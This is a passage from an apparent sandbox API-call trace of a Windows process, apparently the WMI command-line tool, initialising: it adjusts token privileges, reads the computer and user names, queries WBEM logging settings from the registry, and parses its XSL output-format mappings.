[2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xffc92940 | out: ppv=0xffc92940*=0x1d51390) returned 0x0 [0251.539] GetCurrentProcess () returned 0xffffffffffffffff [0251.540] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x24fba0 | out: TokenHandle=0x24fba0*=0xf4) returned 1 [0251.540] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24fb98 | out: TokenInformation=0x0, ReturnLength=0x24fb98) returned 0 [0251.540] malloc (_Size=0x118) returned 0x436980 [0251.540] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x436980, TokenInformationLength=0x118, ReturnLength=0x24fb98 | out: TokenInformation=0x436980, ReturnLength=0x24fb98) returned 1 [0251.540] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x436980*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=245254013, Attributes=0xa580), (Luid.LowPart=0x0, Luid.HighPart=4423536, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0251.540] free (_Block=0x436980) [0251.540] CloseHandle (hObject=0xf4) returned 1 [0251.540] malloc (_Size=0x40) returned 0x437f70 [0251.540] malloc (_Size=0x40) returned 0x436980 [0251.540] malloc (_Size=0x40) returned 0x4369d0 [0251.540] malloc (_Size=0x20a) returned 0x436a20 [0251.540] GetSystemDirectoryW (in: lpBuffer=0x436a20, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0251.540] free (_Block=0x436a20) [0251.540] malloc (_Size=0x18) returned 0x436a20 [0251.541] malloc (_Size=0x18) returned 0x436a40 [0251.541] malloc (_Size=0x18) returned 0x436a60 [0251.541] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0251.541] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0251.541] free (_Block=0x436a20) [0251.541] free (_Block=0x436a40) [0251.541] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0251.541] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0251.541] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0251.543] FreeLibrary (hLibModule=0x77940000) returned 1 [0251.543] free (_Block=0x436a60) [0251.543] _vsnwprintf (in: _Buffer=0x4369d0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x24f7c8 | out: _Buffer="ms_409") returned 6 [0251.543] malloc (_Size=0x20) returned 0x436a20 [0251.543] GetComputerNameW (in: lpBuffer=0x436a20, nSize=0x24fba0 | out: lpBuffer="XDUWTFONO", nSize=0x24fba0) returned 1 [0251.544] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.544] malloc (_Size=0x14) returned 0x436a50 [0251.544] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.544] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x24fb98 | out: lpNameBuffer=0x0, nSize=0x24fb98) returned 0x7fffffde000 [0251.545] GetLastError () returned 0xea [0251.545] malloc (_Size=0x40) returned 0x436a70 [0251.545] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x436a70, nSize=0x24fb98 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24fb98) returned 0x1 [0251.546] lstrlenW (lpString="") returned 0 [0251.546] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.546] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0251.548] lstrlenW (lpString=".") returned 1 [0251.549] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.549] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0251.549] lstrlenW (lpString="LOCALHOST") returned 9 [0251.549] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.549] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0251.549] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.549] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.549] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0251.549] free (_Block=0x436a50) [0251.549] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.549] malloc (_Size=0x14) returned 0x436a50 [0251.549] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.549] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.549] malloc (_Size=0x14) returned 0x436ac0 [0251.549] lstrlenW (lpString="XDUWTFONO") returned 9 [0251.549] malloc (_Size=0x8) returned 0x436ae0 [0251.549] malloc (_Size=0x18) returned 0x436b00 [0251.549] malloc (_Size=0x30) returned 0x436b20 [0251.549] malloc (_Size=0x18) returned 0x436b60 [0251.550] SysStringLen (param_1="IDENTIFY") returned 0x8 [0251.550] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0251.550] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0251.550] SysStringLen (param_1="IDENTIFY") returned 0x8 [0251.550] malloc (_Size=0x30) returned 0x436b80 [0251.550] malloc (_Size=0x18) returned 0x436bc0 [0251.550] SysStringLen (param_1="IMPERSONATE") returned 0xb [0251.550] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0251.550] SysStringLen (param_1="IMPERSONATE") returned 0xb [0251.550] SysStringLen (param_1="IDENTIFY") returned 0x8 [0251.550] SysStringLen (param_1="IDENTIFY") returned 0x8 [0251.550] SysStringLen (param_1="IMPERSONATE") returned 0xb [0251.550] malloc (_Size=0x30) returned 0x436be0 [0251.550] malloc (_Size=0x18) returned 0x436c20 [0251.550] SysStringLen (param_1="DELEGATE") returned 0x8 [0251.550] SysStringLen (param_1="IDENTIFY") returned 0x8 [0251.550] SysStringLen (param_1="DELEGATE") returned 0x8 [0251.550] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0251.550] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0251.550] SysStringLen (param_1="DELEGATE") returned 0x8 [0251.550] malloc (_Size=0x30) returned 0x436c40 [0251.550] malloc (_Size=0x18) returned 0x436c80 [0251.551] malloc (_Size=0x30) returned 0x436ca0 [0251.551] malloc (_Size=0x18) returned 0x436ce0 [0251.551] SysStringLen (param_1="NONE") returned 0x4 [0251.551] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.551] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.551] SysStringLen (param_1="NONE") returned 0x4 [0251.551] malloc (_Size=0x30) returned 0x436d00 [0251.551] malloc (_Size=0x18) returned 0x436d40 [0251.551] SysStringLen (param_1="CONNECT") returned 0x7 [0251.551] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.551] malloc (_Size=0x30) returned 0x436d60 [0251.551] malloc (_Size=0x18) returned 0x436da0 [0251.551] SysStringLen (param_1="CALL") returned 0x4 [0251.551] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.551] SysStringLen (param_1="CALL") returned 0x4 [0251.551] SysStringLen (param_1="CONNECT") returned 0x7 [0251.551] malloc (_Size=0x30) returned 0x436dc0 [0251.551] malloc (_Size=0x18) returned 0x436e00 [0251.551] SysStringLen (param_1="PKT") returned 0x3 [0251.551] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.551] SysStringLen (param_1="PKT") returned 0x3 [0251.552] SysStringLen (param_1="NONE") returned 0x4 [0251.552] SysStringLen (param_1="NONE") returned 0x4 [0251.552] SysStringLen (param_1="PKT") returned 0x3 [0251.552] malloc (_Size=0x30) returned 0x436e20 [0251.552] malloc (_Size=0x18) returned 0x436e60 [0251.552] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0251.552] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.552] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0251.552] SysStringLen (param_1="NONE") returned 0x4 [0251.552] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0251.552] SysStringLen (param_1="PKT") returned 0x3 [0251.552] SysStringLen (param_1="PKT") returned 0x3 [0251.552] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0251.552] malloc (_Size=0x30) returned 0x438000 [0251.553] malloc (_Size=0x18) returned 0x436e80 [0251.553] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0251.553] SysStringLen (param_1="DEFAULT") returned 0x7 [0251.553] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0251.553] SysStringLen (param_1="PKT") returned 0x3 [0251.553] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0251.553] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0251.553] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0251.553] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0251.553] malloc (_Size=0x30) returned 0x438040 [0251.553] malloc (_Size=0x40) returned 0x436ea0 [0251.553] malloc (_Size=0x20a) returned 0x436ef0 [0251.553] GetSystemDirectoryW (in: lpBuffer=0x436ef0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0251.553] free (_Block=0x436ef0) [0251.553] malloc (_Size=0x18) returned 0x436ef0 [0251.553] malloc (_Size=0x18) returned 0x436f10 [0251.553] malloc (_Size=0x18) returned 0x436f30 [0251.553] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0251.553] SysStringLen (param_1="\\wbem\\") returned 0x6 [0251.554] free (_Block=0x436ef0) [0251.554] free (_Block=0x436f10) [0251.554] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0251.554] free (_Block=0x436f30) [0251.554] malloc (_Size=0x18) returned 0x436ef0 [0251.554] malloc (_Size=0x18) returned 0x436f10 [0251.554] malloc (_Size=0x18) returned 0x436f30 [0251.554] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0251.554] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0251.554] free (_Block=0x436ef0) [0251.554] free (_Block=0x436f10) [0251.554] GetCurrentThreadId () returned 0xb18 [0251.554] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x24f4a0 | out: phkResult=0x24f4a0*=0xf8) returned 0x0 [0251.555] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x24f4f0, lpcbData=0x24f490*=0x400 | out: lpType=0x0, lpData=0x24f4f0*=0x30, lpcbData=0x24f490*=0x4) returned 0x0 [0251.555] _wcsicmp (_String1="0", _String2="1") returned -1 [0251.555] _wcsicmp (_String1="0", _String2="2") returned -2 [0251.555] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x24f490*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x24f490*=0x42) returned 0x0 [0251.555] malloc (_Size=0x86) returned 0x436f50 [0251.555] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x436f50, lpcbData=0x24f490*=0x42 | out: lpType=0x0, lpData=0x436f50*=0x25, lpcbData=0x24f490*=0x42) returned 0x0 [0251.555] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0251.555] malloc (_Size=0x42) returned 0x436fe0 [0251.555] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0251.555] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x24f4f0, lpcbData=0x24f490*=0x400 | out: lpType=0x0, lpData=0x24f4f0*=0x36, lpcbData=0x24f490*=0xc) returned 0x0 [0251.555] _wtol (_String="65536") returned 65536 [0251.555] free (_Block=0x436f50) [0251.555] RegCloseKey (hKey=0x0) returned 0x6 [0251.555] CoCreateInstance (in: rclsid=0xffc27410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffc273f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x24f998 | out: ppv=0x24f998*=0x1b171d0) returned 0x0 [0251.586] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x1b171d0, xmlSource=0x24fae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x436ef0), isSuccessful=0x24fb50 | out: isSuccessful=0x24fb50*=0xffff) returned 0x0 [0251.832] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1b171d0, DOMElement=0x24f990 | out: DOMElement=0x24f990*=0x1b1bc50) returned 0x0 [0251.833] malloc (_Size=0x18) returned 0x43c560 [0251.833] IXMLDOMElement:getElementsByTagName (in: This=0x1b1bc50, tagName="XSLFORMAT", resultList=0x24f9a0 | out: resultList=0x24f9a0*=0x1b19cc0) returned 0x0 [0251.833] free (_Block=0x43c560) [0251.834] IXMLDOMNodeList:get_length (in: This=0x1b19cc0, listLength=0x24fb68 | out: listLength=0x24fb68*=21) returned 0x0 [0251.834] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=0, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.834] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="texttable.xsl") returned 0x0 [0251.834] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.834] malloc (_Size=0x18) returned 0x43c560 [0251.835] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.835] free (_Block=0x43c560) [0251.835] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x4)) returned 0x0 [0251.835] malloc (_Size=0x18) returned 0x43c560 [0251.835] malloc (_Size=0x18) returned 0x43c580 [0251.835] malloc (_Size=0x30) returned 0x438080 [0251.835] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.835] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.835] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.835] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=1, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.835] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="textvaluelist.xsl") returned 0x0 [0251.835] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.835] malloc (_Size=0x18) returned 0x43c5a0 [0251.836] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.836] free (_Block=0x43c5a0) [0251.836] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x4)) returned 0x0 [0251.836] malloc (_Size=0x18) returned 0x43c5a0 [0251.836] malloc (_Size=0x18) returned 0x43c5c0 [0251.836] SysStringLen (param_1="VALUE") returned 0x5 [0251.836] SysStringLen (param_1="TABLE") returned 0x5 [0251.836] SysStringLen (param_1="TABLE") returned 0x5 [0251.836] SysStringLen (param_1="VALUE") returned 0x5 [0251.836] malloc (_Size=0x30) returned 0x4380c0 [0251.836] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.836] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.836] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.836] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=2, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.836] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="textvaluelist.xsl") returned 0x0 [0251.836] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.836] malloc (_Size=0x18) returned 0x43c5e0 [0251.837] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.837] free (_Block=0x43c5e0) [0251.837] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x4)) returned 0x0 [0251.837] malloc (_Size=0x18) returned 0x43c5e0 [0251.837] malloc (_Size=0x18) returned 0x43c600 [0251.837] SysStringLen (param_1="LIST") returned 0x4 [0251.837] SysStringLen (param_1="TABLE") returned 0x5 [0251.837] malloc (_Size=0x30) returned 0x438100 [0251.837] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.837] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.837] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.837] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=3, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.837] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="rawxml.xsl") returned 0x0 [0251.837] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.837] malloc (_Size=0x18) returned 0x43c620 [0251.837] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.838] free (_Block=0x43c620) [0251.838] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x4)) returned 0x0 [0251.838] malloc (_Size=0x18) returned 0x43c620 [0251.838] malloc (_Size=0x18) returned 0x43c640 [0251.838] SysStringLen (param_1="RAWXML") returned 0x6 [0251.838] SysStringLen (param_1="TABLE") returned 0x5 [0251.838] SysStringLen (param_1="RAWXML") returned 0x6 [0251.838] SysStringLen (param_1="LIST") returned 0x4 [0251.838] SysStringLen (param_1="LIST") returned 0x4 [0251.838] SysStringLen (param_1="RAWXML") returned 0x6 [0251.838] malloc (_Size=0x30) returned 0x438140 [0251.838] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.838] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.838] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.838] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=4, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.838] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="htable.xsl") returned 0x0 [0251.838] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.838] malloc (_Size=0x18) returned 0x43c660 [0251.838] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.839] free (_Block=0x43c660) [0251.839] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x4)) returned 0x0 [0251.839] malloc (_Size=0x18) returned 0x43c660 [0251.839] malloc (_Size=0x18) returned 0x43c680 [0251.839] SysStringLen (param_1="HTABLE") returned 0x6 [0251.839] SysStringLen (param_1="TABLE") returned 0x5 [0251.839] SysStringLen (param_1="HTABLE") returned 0x6 [0251.839] SysStringLen (param_1="LIST") returned 0x4 [0251.839] malloc (_Size=0x30) returned 0x438180 [0251.839] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.839] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.839] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.839] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=5, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.839] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="hform.xsl") returned 0x0 [0251.839] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.839] malloc (_Size=0x18) returned 0x43c6a0 [0251.839] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.840] free (_Block=0x43c6a0) [0251.840] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x4)) returned 0x0 [0251.840] malloc (_Size=0x18) returned 0x43c6a0 [0251.840] malloc (_Size=0x18) returned 0x43c6c0 [0251.840] SysStringLen (param_1="HFORM") returned 0x5 [0251.840] SysStringLen (param_1="TABLE") returned 0x5 [0251.840] SysStringLen (param_1="HFORM") returned 0x5 [0251.840] SysStringLen (param_1="LIST") returned 0x4 [0251.840] SysStringLen (param_1="HFORM") returned 0x5 [0251.840] SysStringLen (param_1="HTABLE") returned 0x6 [0251.840] malloc (_Size=0x30) returned 0x4381c0 [0251.840] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.840] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.840] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.840] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=6, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.840] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="xml.xsl") returned 0x0 [0251.840] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.840] malloc (_Size=0x18) returned 0x43c6e0 [0251.841] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.841] free (_Block=0x43c6e0) [0251.841] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x4)) returned 0x0 [0251.841] malloc (_Size=0x18) returned 0x43c6e0 [0251.841] malloc (_Size=0x18) returned 0x43c700 [0251.841] SysStringLen (param_1="XML") returned 0x3 [0251.841] SysStringLen (param_1="TABLE") returned 0x5 [0251.841] SysStringLen (param_1="XML") returned 0x3 [0251.841] SysStringLen (param_1="VALUE") returned 0x5 [0251.841] SysStringLen (param_1="VALUE") returned 0x5 [0251.841] SysStringLen (param_1="XML") returned 0x3 [0251.841] malloc (_Size=0x30) returned 0x438200 [0251.841] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.841] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.841] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.841] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=7, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.842] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="mof.xsl") returned 0x0 [0251.842] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.842] malloc (_Size=0x18) returned 0x43c720 [0251.842] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.842] free (_Block=0x43c720) [0251.842] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x4)) returned 0x0 [0251.842] malloc (_Size=0x18) returned 0x43c720 [0251.842] malloc (_Size=0x18) returned 0x43c740 [0251.842] SysStringLen (param_1="MOF") returned 0x3 [0251.842] SysStringLen (param_1="TABLE") returned 0x5 [0251.842] SysStringLen (param_1="MOF") returned 0x3 [0251.842] SysStringLen (param_1="LIST") returned 0x4 [0251.842] SysStringLen (param_1="MOF") returned 0x3 [0251.842] SysStringLen (param_1="RAWXML") returned 0x6 [0251.842] SysStringLen (param_1="LIST") returned 0x4 [0251.842] SysStringLen (param_1="MOF") returned 0x3 [0251.843] malloc (_Size=0x30) returned 0x438240 [0251.843] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.843] IUnknown:Release (This=0x1b178d0) returned 0x0 [0251.843] IUnknown:Release (This=0x1b1a280) returned 0x0 [0251.843] IXMLDOMNodeList:get_item (in: This=0x1b19cc0, index=8, listItem=0x24f970 | out: listItem=0x24f970*=0x1b1bd50) returned 0x0 [0251.843] IXMLDOMNode:get_text (in: This=0x1b1bd50, text=0x24f980 | out: text=0x24f980*="csv.xsl") returned 0x0 [0251.843] IXMLDOMNode:get_attributes (in: This=0x1b1bd50, attributeMap=0x24f978 | out: attributeMap=0x24f978*=0x1b178d0) returned 0x0 [0251.843] malloc (_Size=0x18) returned 0x43c760 [0251.843] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1b178d0, name="KEYWORD", namedItem=0x24f988 | out: namedItem=0x24f988*=0x1b1a280) returned 0x0 [0251.843] free (_Block=0x43c760) [0251.843] IXMLDOMNode:get_nodeValue (in: This=0x1b1a280, value=0x24f9c0 | out: value=0x24f9c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x4)) returned 0x0 [0251.843] malloc (_Size=0x18) returned 0x43c760 [0251.843] malloc (_Size=0x18) returned 0x43c780 [0251.844] SysStringLen (param_1="CSV") returned 0x3 [0251.844] SysStringLen (param_1="TABLE") returned 0x5 [0251.844] SysStringLen (param_1="CSV") returned 0x3 [0251.844] SysStringLen (param_1="LIST") returned 0x4 [0251.844] SysStringLen (param_1="CSV") returned 0x3 [0251.844] SysStringLen (param_1="HTABLE") returned 0x6 [0251.844] SysStringLen (param_1="CSV") returned 0x3 [0251.844] SysStringLen (param_1="HFORM") returned 0x5 [0251.844] malloc (_Size=0x30) returned 0x438280 [0251.844] IUnknown:Release (This=0x1b1bd50) returned 0x0 [0251.844] IUnknown:Release 